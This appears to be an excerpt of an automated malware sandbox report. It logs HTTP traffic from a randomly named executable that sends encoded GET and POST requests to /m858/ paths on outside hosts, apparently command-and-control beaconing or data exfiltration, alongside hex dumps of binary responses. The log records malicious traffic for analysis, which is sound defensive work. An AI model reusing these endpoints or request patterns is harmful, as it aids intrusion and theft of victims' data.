                                                                                                                      Data Raw: 31 36 36 31 0d 0a b0 d8 25 8a 6a d6 0f 89 a8 26 f5 00 68 a4 2c 9c bf 3f 42 86 b9 ff 54 2d bf b6 66 5c f4 cf d0 dc 68 b5 06 48 00 0c 22 b1 b7 72 fa b1 72 0c 3b 20 09 91 d8 05 09 1a 00 15 4e a3 9f 72 53 85 14 9b 5a f2 fd bd d3 aa 9c 2a 05 f9 1b 76 a9 69 76 06 21 90 d4 8d 4c b3 ce 9e 73 11 f5 11 5f 12 33 88 cf 61 5a dd 33 be 4b 86 80 aa 0b 22 e3 91 b4 86 63 ba cf d9 24 7a 4f 64 17 24 f7 d7 5e cd e1 29 80 84 81 0c af 0d a6 0f 0f 2b e8 6d 01 5f fe 02 92 6d a0 92 22 fb 74 a5 cb b1 67 e2 b6 fb de ee 5f fd 7f a5 35 d9 69 57 7a 47 29 9d e0 2b a5 f2 83 21 40 63 a4 09 3a 98 00 96 c7 70 be 53 42 40 8c 87 db 96 31 2d ef e7 e8 29 23 44 cc 86 62 4d 0a 01 ed d6 b3 c7 5d e8 0d 0c 53 69 d6 05 23 ef d2 8d 24 5f 7e 23 b6 e7 12 74 30 6a fd 9a 6c 15 0c 36 c0 f0 a8 9e 8b 80 f3 5f 2e df 3b ff e9 f2 1d 38 ff e2 fc 87 0e c6 06 67 46 c9 84 fe 3e ba d0 9b 1b a8 3b e9 bc 0a b7 ff 2e 1f 5e 9b 84 b0 46 15 5a fc 4d 7b e8 36 6e c3 61 f8 27 f9 13 44 7c 2d 8d ba 65 11 45 a5 f7 6f ec 93 3f 87 57 f9 58 b8 79 be 4a 5e 7a 79 45 f6 c1 40 8e a3 51 a4 b7 95 36 8a ec 54 45 e4 38 12 1f 64 98 3c a9 a4 23 3e 1c 8c c2 74 13 19 3d 3c 80 53 e6 16 8d 7a 68 2b 59 3f b4 40 cf cf 5b a7 06 d9 4c 81 80 13 b0 ef 8d 1b eb 68 ec 46 f0 15 49 13 94 1b 64 50 eb 28 bf 9e c9 46 a9 a6 7f 49 4d dd a8 9e 7b bf f1 e6 9b c0 45 a2 30 48 b7 09 30 4c 2d 74 2f 5b 15 ef c9 eb 40 fd 29 17 99 dd 48 84 78 1f e3 69 34 56 36 3e e6 94 27 31 63 71 6f 07 1b 8d 43 bb a0 c8 64 da 79 b0 53 dd 11 30 5c 81 d6 da f8 58 36 9e ec c6 14 f4 a9 b1 2d 11 45 c3 ed 16 ce 56 36 f8 85 72 c7 5b 0c 76 0a 0a d4 60 e8 f6 af f1 02 e2 f5 6c f6 4c 1f 09 ea 98 50 5e 63 af 83 02 ed c1 8e 41 f7 fa 89 6a 60 a7 43 37 12 98 5b 79 df 4a 1f e0 cd cf bf 0a 3d 07 b6 85 2d 67 51 06 04 e4 d1 fb 60 a5 0f 9b 96 d6 35 a3 53 de c7 c1 8f d7 c7 5e d9 18 08 59 cf 3a 2a d5 d3 fc 8c c6 d6 d2 78 56 c3 46 de 7d f9 0d 04 31 08 28 51 3d 58 24 42 33 54 64 da 27 a1 7d df 5d 05 b7 07 cd aa 9a 9a e6 f9 7b 6f 07 9f 02 32 68 43 7c dd a9 5e 92 2e 14 7a a1 f5 11 bd 18 b3 e9 f6 01 09 93 85 60 2d 22 eb 5a 84 d1 8b a1 af 9f f8 f0 88 5e 0c 87 51 21 81 de 55 d5 9b 3a 28 84 d1 8b ba 81 55 4d dd 9f ff 00 6b b1 20 8c 26 67 02 a6 10 46 91 8c 12 91 ab c3 a8 51 9b a3 d3 76 40 02 9d 7f 7d fe e5 e5 5b 4f 7f 74 fe f7 f9 17 e7 5f 43 8f 1d 47 f3 e7 f3 2f 2e df 81 cf 7e 75 f9 d6 d3 1f 7d f6 ab a7 3f 02 02 1d a1 1c cd 9f cf bf 78 fa a3 f3 5f e1 f2 9d f3 df ce bf 84 f3 2f 2e ff 0f 76 6d ce 7f bd 7c 07 08 5c fe 7f fe c5 e5 ff 70 fe f1 e5 ff 08 23 87 3e da e2 18 27 d9 fb 86 f7 44 bc 79 74 c2 c8 73 27 5f aa 39 55 85 24 ba cd e4 6f 36 c3 28 48 d7 aa 40 83 4b 71 33 9f 1f 82 3b bc 66 f5 10 64 b4 5a de 52 fd 68 64 50 b2 ea f6 82 bf 3d f6 05 fa 53 ef 82 72 fd 9d 0f 4e 0f ed 09 9d 30 fa 74 52 ee 40 f4 30 4e 01 09 94 91 30 3f 4c 80 35 46 a7 8f 31 d2 43 a6 54
                                                                                                                      Data Ascii: 1661%j&h,?BT-f\hH"rr; NrSZ*viv!Ls_3aZ3K"c$zOd$^)+m_m"tg_5iWzG)+!@c:pSB@1-)#DbM]Si#$_~#t0jl6_.;8gF>;.^FZM{6na'D|-eEo?WXyJ^zyE@Q6TE8d<#>t=<Szh+Y?@[LhFIdP(FIM{E0H0L-t/[@)Hxi4V6>'1cqoCdyS0\X6-EV6r[v`lLP^cAj`C7[yJ=-gQ`5S^Y:*xVF}1(Q=X$B3Td'}]{o2hC|^.z`-"Z^Q!U:(UMk &gFQv@}[Ot_CG/.~u}?x_/.vm|\p#>'Dyts'_9U$o6(H@Kq3;fdZRhdP=SrN0tR@0N0?L5F1CT
                                                                                                                      Dec 7, 2023 15:54:20.452034950 CET1286INData Raw: 8d 44 be 31 dc 09 f3 a7 e5 3b 16 6a 8e b0 a1 4d d4 69 6e 02 a2 73 0d 55 38 27 fd cb bd 6c d5 ab d5 bd aa 03 e2 d6 dc ee b8 f5 82 c7 61 de 67 f0 63 26 54 cf 85 7a 45 e1 b4 32 08 a3 a4 3f 2c df 46 05 39 60 63 24 12 4e 31 ea fd b5 1d 12 45 89 51 2d
                                                                                                                      Data Ascii: D1;jMinsU8'lagc&TzE2?,F9`c$N1EQ-M]OClw8U]ht$~<xp*dS*,@7H*cbt;_@!V!Fssz=D(C0Rui_&xoDOzmY|\F9Klig
                                                                                                                      Dec 7, 2023 15:54:20.452111959 CET1286INData Raw: aa af 81 59 68 c7 cd 4c b3 20 50 d5 c7 0b 76 d9 3e df 60 08 17 2c 3e 49 3a 50 c1 ae d6 b4 2a a0 68 f1 00 b7 eb ab da 2d 4f d5 cf f9 d2 f7 38 6b f5 4b df e3 3b 5c df 1d a7 01 bf 7c 3c 00 5f df 04 a6 01 bf 0c 97 9f 06 fc 72 9c 14 0a 87 b0 8c 59 34
                                                                                                                      Data Ascii: YhL Pv>`,>I:P*h-O8kK;\|<_rY46!lx#0,=.fc^8.v/t]R`/I]g>JXs4Z*odQ-2^/a59`Pvho`,qm?j`pI1v|I7ZOKWZ-JP
                                                                                                                      Dec 7, 2023 15:54:20.452234030 CET1286INData Raw: d7 28 a7 98 46 50 05 99 5b 85 99 db 9b 0d 14 4b 66 4a f6 34 6c 41 92 47 fa c5 56 de d1 72 39 fe 58 09 0c d5 53 ac cb f6 00 24 1b 5c 56 90 b1 55 8c b1 31 6c e4 2d c5 ed ee 2e b1 14 e6 2a 29 e3 d6 c1 00 7b 5d 5b fa 27 de e0 01 f0 f3 65 ab 0d 9d 43
                                                                                                                      Data Ascii: (FP[KfJ4lAGVr9XS$\VU1l-.*){]['eC{xP&:U44UBi8G73<VRUig~%iD|2)Z3'Se#}BHc=dyN*"-mG`1n:=i522-XmH(Cx&
                                                                                                                      Dec 7, 2023 15:54:20.452301025 CET964INData Raw: 4b e3 a5 bb 42 7f 64 ef 02 c5 91 4c a8 f7 34 75 dc 99 b9 02 e9 46 84 8f 0e 49 b3 92 cc 15 59 ea 4c d3 63 ec c3 3f 76 eb b3 7a d1 e0 8d ae 4d 2f 1b 1e 15 ad 9e 00 e6 bf 81 21 97 35 43 58 fc ef 78 d3 ab d1 0c 91 a2 22 98 0a 49 5d 0e bd 0f b7 28 90
                                                                                                                      Data Ascii: KBdL4uFIYLc?vzM/!5CXx"I](<PtKdLP$4H6),nP){-]~'%H.)rK0FnMa=_/p\X~LWg*9a}`^4-z4,WX+ +
                                                                                                                      Dec 7, 2023 15:54:20.452754021 CET6INData Raw: 31 0d 0a 03 0d 0a
                                                                                                                      Data Ascii: 1
                                                                                                                      Dec 7, 2023 15:54:20.452811003 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      20192.168.2.1149731217.144.107.2802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:54:22.488482952 CET438OUTGET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dIPmy2erOJpsQ9g== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.sorenad.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:54:23.241965055 CET447INHTTP/1.1 301 Moved Permanently
                                                                                                                      Connection: close
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      x-redirect-by: WordPress
                                                                                                                      location: http://sorenad.com/m858/?GJ=C4IdWhJXSFOXR8D&yRV=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dIPmy2erOJpsQ9g==
                                                                                                                      content-length: 0
                                                                                                                      date: Thu, 07 Dec 2023 14:54:22 GMT
                                                                                                                      server: LiteSpeed


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      21192.168.2.114973264.190.62.22802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:54:29.096786976 CET725OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.medical-loan24.live
                                                                                                                      Origin: http://www.medical-loan24.live
                                                                                                                      Referer: http://www.medical-loan24.live/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 46 75 39 72 4d 4f 49 78 52 35 52 52 7a 52 37 63 34 58 6b 79 61 58 2f 54 75 4e 75 78 6c 37 76 77 50 50 6d 69 61 4b 44 64 32 76 48 41 69 44 63 31 6c 72 56 4f 34 59 59 52 50 54 46 6c 77 31 6a 72 64 56 4d 56 53 64 73 4c 38 6c 69 37 4a 38 49 75 67 55 43 4a 38 6f 71 44 44 32 6c 4a 5a 33 4d 44 74 7a 54 6a 55 78 4d 41 4d 61 69 5a 62 69 4c 69 46 4b 4a 2f 39 56 56 6d 72 67 57 6b 2b 47 64 49 2b 54 37 79 51 59 44 75 49 74 5a 30 4d 77 4a 34 71 45 32 47 78 78 50 6d 45 4c 79 71 72 61 6c 39 66 55 37 48 6d 43 30 70 6b 48 72 42 68 42 6c 41 4c 41 3d 3d
                                                                                                                      Data Ascii: yRV=Fu9rMOIxR5RRzR7c4XkyaX/TuNuxl7vwPPmiaKDd2vHAiDc1lrVO4YYRPTFlw1jrdVMVSdsL8li7J8IugUCJ8oqDD2lJZ3MDtzTjUxMAMaiZbiLiFKJ/9VVmrgWk+GdI+T7yQYDuItZ0MwJ4qE2GxxPmELyqral9fU7HmC0pkHrBhBlALA==
                                                                                                                      Dec 7, 2023 15:54:29.340286970 CET299INHTTP/1.1 405 Not Allowed
                                                                                                                      date: Thu, 07 Dec 2023 14:54:29 GMT
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 154
                                                                                                                      server: NginX
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      22192.168.2.114973364.190.62.22802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:54:31.865360022 CET745OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.medical-loan24.live
                                                                                                                      Origin: http://www.medical-loan24.live
                                                                                                                      Referer: http://www.medical-loan24.live/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 46 75 39 72 4d 4f 49 78 52 35 52 52 7a 79 7a 63 36 77 77 79 50 6e 2f 63 6a 64 75 78 38 72 76 30 50 50 69 69 61 50 36 59 32 64 54 41 69 6a 73 31 6b 76 35 4f 35 59 59 52 45 7a 45 68 36 56 6a 65 64 56 41 6e 53 5a 6b 4c 38 68 43 37 4a 39 34 75 68 6a 57 4f 38 34 71 4e 46 32 6c 78 57 58 4d 44 74 7a 54 6a 55 78 49 71 4d 62 47 5a 48 43 37 69 46 72 4a 34 77 31 56 6c 6f 67 57 6b 70 57 64 55 2b 54 36 6e 51 64 72 41 49 72 64 30 4d 78 35 34 72 51 69 46 37 78 4f 74 62 62 7a 4b 6c 37 63 59 62 44 69 33 34 48 67 36 71 7a 57 65 74 30 4a 54 4d 34 51 68 4f 37 4b 2b 55 32 4d 55 4e 43 38 72 69 7a 2b 70 31 41 49 3d
                                                                                                                      Data Ascii: yRV=Fu9rMOIxR5RRzyzc6wwyPn/cjdux8rv0PPiiaP6Y2dTAijs1kv5O5YYREzEh6VjedVAnSZkL8hC7J94uhjWO84qNF2lxWXMDtzTjUxIqMbGZHC7iFrJ4w1VlogWkpWdU+T6nQdrAIrd0Mx54rQiF7xOtbbzKl7cYbDi34Hg6qzWet0JTM4QhO7K+U2MUNC8riz+p1AI=
                                                                                                                      Dec 7, 2023 15:54:32.108922958 CET299INHTTP/1.1 405 Not Allowed
                                                                                                                      date: Thu, 07 Dec 2023 14:54:31 GMT
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 154
                                                                                                                      server: NginX
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      23192.168.2.114973464.190.62.22802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:54:34.630893946 CET1758OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.medical-loan24.live
                                                                                                                      Origin: http://www.medical-loan24.live
                                                                                                                      Referer: http://www.medical-loan24.live/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 46 75 39 72 4d 4f 49 78 52 35 52 52 7a 79 7a 63 36 77 77 79 50 6e 2f 63 6a 64 75 78 38 72 76 30 50 50 69 69 61 50 36 59 32 64 4c 41 69 77 6b 31 6c 4f 35 4f 36 59 59 52 48 7a 45 73 36 56 6a 35 64 56 49 6a 53 5a 68 32 38 6e 4f 37 49 66 67 75 6f 79 57 4f 70 49 71 4e 48 32 6c 4b 5a 33 4d 73 74 79 6a 6e 55 77 34 71 4d 62 47 5a 48 45 33 69 53 71 4a 34 6a 6c 56 6d 72 67 57 6f 2b 47 64 77 2b 54 54 51 51 64 6d 31 49 62 39 30 4e 52 70 34 70 6a 4b 46 33 78 4f 76 61 62 7a 6f 6c 36 67 4c 62 48 37 4f 34 48 38 55 71 78 47 65 74 44 49 34 66 62 59 75 59 5a 71 64 4b 52 55 55 4f 69 64 65 7a 67 57 6a 70 77 6c 4b 68 52 48 5a 59 78 41 50 2f 56 4a 6f 34 72 77 2b 64 50 38 45 52 67 4b 6d 55 42 4f 36 34 37 6d 5a 6f 46 41 31 38 6b 63 31 49 53 42 75 2f 71 35 6b 39 4c 78 4f 6d 39 6b 52 64 42 36 67 36 6f 78 39 76 34 66 68 58 42 49 69 7a 74 48 2b 4a 4b 61 30 75 6c 56 54 61 4f 77 4f 66 6f 50 65 36 43 52 71 34 39 57 47 43 44 38 30 38 72 31 72 74 67 57 64 4a 61 65 2f 77 70 62 79 37 43 59 74 42 46 7a 52 76 49 6f 4f 54 72 45 6c 76 64 65 58 55 6c 36 46 4f 54 51 61 79 70 2b 77 43 62 49 54 4e 54 31 31 63 78 62 63 53 45 70 63 2b 5a 70 76 76 2b 35 53 64 36 7a 5a 45 6d 51 37 6e 63 42 44 75 78 51 4f 4a 5a 70 4c 47 74 4b 7a 71 46 65 52 6e 50 7a 47 34 50 6c 6b 77 67 6b 42 4b 42 72 7a 4e 35 31 72 68 38 33 4a 64 30 6e 65 63 31 59 65 78 31 69 54 73 44 39 70 71 63 47 61 63 47 50 51 4e 48 70 6c 61 68 7a 59 6c 2b 72 49 6e 36 43 4b 59 73 68 6e 56 67 74 6f 6c 4c 58 56 43 77 58 30 52 37 51 38 2b 79 67 32 44 47 4a 32 38 57 38 6e 32 57 72 75 5a 7a 63 44 4d 65 2f 50 43 49 51 2b 63 67 4d 4e 38 59 7a 59 59 6d 6d 32 2b 56 6f 54 4b 50 46 34 6e 67 64 6d 46 74 68 4c 6d 63 70 37 58 55 5a 6a 6b 74 53 53 6a 5a 35 45 6f 45 34 65 4a 66 39 6a 74 64 32 6c 4f 2f 6e 63 37 74 49 71 51 57 65 33 52 54 45 69 41 54 35 33 32 66 4d 76 57 2b 32 4d 63 64 68 64 43 34 59 6b 77 2b 63 4a 6f 4d 62 43 2f 54 63 35 52 72 2b 49 34 4e 6a 31 2b 50 66 58 31 33 36 75 45 6b 59 52 33 65 45 4e 62 69 34 69 31 33 53 4c 34 4d 79 2f 33 54 37 6e 68 4b 77 64 44 44 48 4d 77 68 6a 41 61 67 42 2f 52 34 54 68 61 30 38 78 53 32 66 31 37 66 6b 56 44 47 72 77 32 71 6c 32 31 67 2f 39 66 74 64 31 32 2b 48 61 62 6f 74 35 36 76 4d 47 71 73 63 4f 79 53 67 75 2f 4a 77 47 65 54 6a 31 4d 4b 37 41 68 2f 34 4e 66 54 6b 54 2b 63 54 56 75 4a 79 55 45 4c 59 49 50 48 34 69 37 6c 52 38 6a 45 44 42 4f 67 57 31 36 79 46 38 6f 37 70 50 32 6e 36 45 48 56 62 77 78 30 64 5a 4b 5a 36 4b 33 64 38 46 61 34 70 47 78 41 31 56 46 38 2b 32 58 44 4f 6b 38 62 6e 74 47 31 42 30 76 46 47 38 54 55 42 4f 35 43 78 65 4f 78 66 56 58 6c 72 55 78 30 34 6f 72 46 48 74 59 45 4d 73 4b 57 4f 4c 59 75 76 67 31 76 4a 36 55 32 2f 63 58 67 31 73 50 66 57 45 6b 2b 52 53 61 4e 4c 64 71 6f 48 30 56 76 4b 36 52 33 4f 78 64 67 76 53 2f 53 58 6f 4f 68 73 77 4e 32 4d 31 4f 72 70 63 79 78 2b 77 65 73 33 6a 58 34 5a 67 52 69 4f 4a 2b 33 75 51 42 2f 39 46 2b 59 6f 7a 4c 4f 62 6e 46 74 50 57 74 67 44 75 66 71 68 4d 78 67 61 30 32 56 56 4a 54 66 6d 66 6d 39 52 39 4c 45 59 74 62 32 6f 45 51 6a 51 65 67 76 2f 5a 62 6a 32 6e 58 65 64 6b 75 78 78 76 48 30 57 6d 58 68 41 6e 57 59 71 6e 56 78 50 71 55 33 75 48 49 65 6b 61 56 67 50 55 68 54 4d 62 5a 7a 67 4c 55 44 6d 72 6c 47 69 44 36 6e 78 30 37 66 46 71 47 48 5a 57 70 47 6e 50 4d 65 69 4f 68 74 79 4f 56 6e 43 33 36 6e 50 54 42 52 37 4c 2f 2f 2f 6e 70 38 78 66 61 47 69 36 47 68 69 46 63 65 59 6f 2b 51 6f 61 43 4a 4a 7a 43 63 6b 71 57 47 34 78 76 6a 55 79 58 35 42 59 2b 6b 49 49 55 6b 6f 43 67 44 52 32 43 70 36 6f 2b 31 73 69 53 55 59 67 67 63 4d 4c 4a 68 54 33 37 65 4c 67 4e 43 67 75 6b 69 5a 6d 64 34 6e 6f 35 45 4f 30 6b 65 37 4b 41 43 6e 39 39 5a 55 59 35 4f 43 44 55 41 72 76 44 58 65 72
                                                                                                                      Data Ascii: yRV=Fu9rMOIxR5RRzyzc6wwyPn/cjdux8rv0PPiiaP6Y2dLAiwk1lO5O6YYRHzEs6Vj5dVIjSZh28nO7IfguoyWOpIqNH2lKZ3MstyjnUw4qMbGZHE3iSqJ4jlVmrgWo+Gdw+TTQQdm1Ib90NRp4pjKF3xOvabzol6gLbH7O4H8UqxGetDI4fbYuYZqdKRUUOidezgWjpwlKhRHZYxAP/VJo4rw+dP8ERgKmUBO647mZoFA18kc1ISBu/q5k9LxOm9kRdB6g6ox9v4fhXBIiztH+JKa0ulVTaOwOfoPe6CRq49WGCD808r1rtgWdJae/wpby7CYtBFzRvIoOTrElvdeXUl6FOTQayp+wCbITNT11cxbcSEpc+Zpvv+5Sd6zZEmQ7ncBDuxQOJZpLGtKzqFeRnPzG4PlkwgkBKBrzN51rh83Jd0nec1Yex1iTsD9pqcGacGPQNHplahzYl+rIn6CKYshnVgtolLXVCwX0R7Q8+yg2DGJ28W8n2WruZzcDMe/PCIQ+cgMN8YzYYmm2+VoTKPF4ngdmFthLmcp7XUZjktSSjZ5EoE4eJf9jtd2lO/nc7tIqQWe3RTEiAT532fMvW+2McdhdC4Ykw+cJoMbC/Tc5Rr+I4Nj1+PfX136uEkYR3eENbi4i13SL4My/3T7nhKwdDDHMwhjAagB/R4Tha08xS2f17fkVDGrw2ql21g/9ftd12+Habot56vMGqscOySgu/JwGeTj1MK7Ah/4NfTkT+cTVuJyUELYIPH4i7lR8jEDBOgW16yF8o7pP2n6EHVbwx0dZKZ6K3d8Fa4pGxA1VF8+2XDOk8bntG1B0vFG8TUBO5CxeOxfVXlrUx04orFHtYEMsKWOLYuvg1vJ6U2/cXg1sPfWEk+RSaNLdqoH0VvK6R3OxdgvS/SXoOhswN2M1Orpcyx+wes3jX4ZgRiOJ+3uQB/9F+YozLObnFtPWtgDufqhMxga02VVJTfmfm9R9LEYtb2oEQjQegv/Zbj2nXedkuxxvH0WmXhAnWYqnVxPqU3uHIekaVgPUhTMbZzgLUDmrlGiD6nx07fFqGHZWpGnPMeiOhtyOVnC36nPTBR7L///np8xfaGi6GhiFceYo+QoaCJJzCckqWG4xvjUyX5BY+kIIUkoCgDR2Cp6o+1siSUYggcMLJhT37eLgNCgukiZmd4no5EO0ke7KACn99ZUY5OCDUArvDXer
                                                                                                                      Dec 7, 2023 15:54:34.874718904 CET299INHTTP/1.1 405 Not Allowed
                                                                                                                      date: Thu, 07 Dec 2023 14:54:34 GMT
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 154
                                                                                                                      server: NginX
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      24192.168.2.114973564.190.62.22802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:54:37.397350073 CET446OUTGET /m858/?yRV=IsVLP75BXPV29irb7QUBT0f93P2nzsiWNaG7Z6nH6v/C9T4Z/rVV4+geNHA05yDya3IUff47iHu4NOYvgxXZ16OgIRZyd1QpzQ==&GJ=C4IdWhJXSFOXR8D HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.medical-loan24.live
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:54:37.672962904 CET1286INHTTP/1.1 200 OK
                                                                                                                      date: Thu, 07 Dec 2023 14:54:37 GMT
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      transfer-encoding: chunked
                                                                                                                      vary: Accept-Encoding
                                                                                                                      x-powered-by: PHP/8.1.17
                                                                                                                      expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                      cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                      pragma: no-cache
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_a9Q6tIE2GsPMW9YmbUF6OLg0v6uRxk7RhICzcqB0tQjcGj1T68EQw1E3f2L3/J4lGWAQHiVtqFAAqhkfszULJg==
                                                                                                                      last-modified: Thu, 07 Dec 2023 14:54:37 GMT
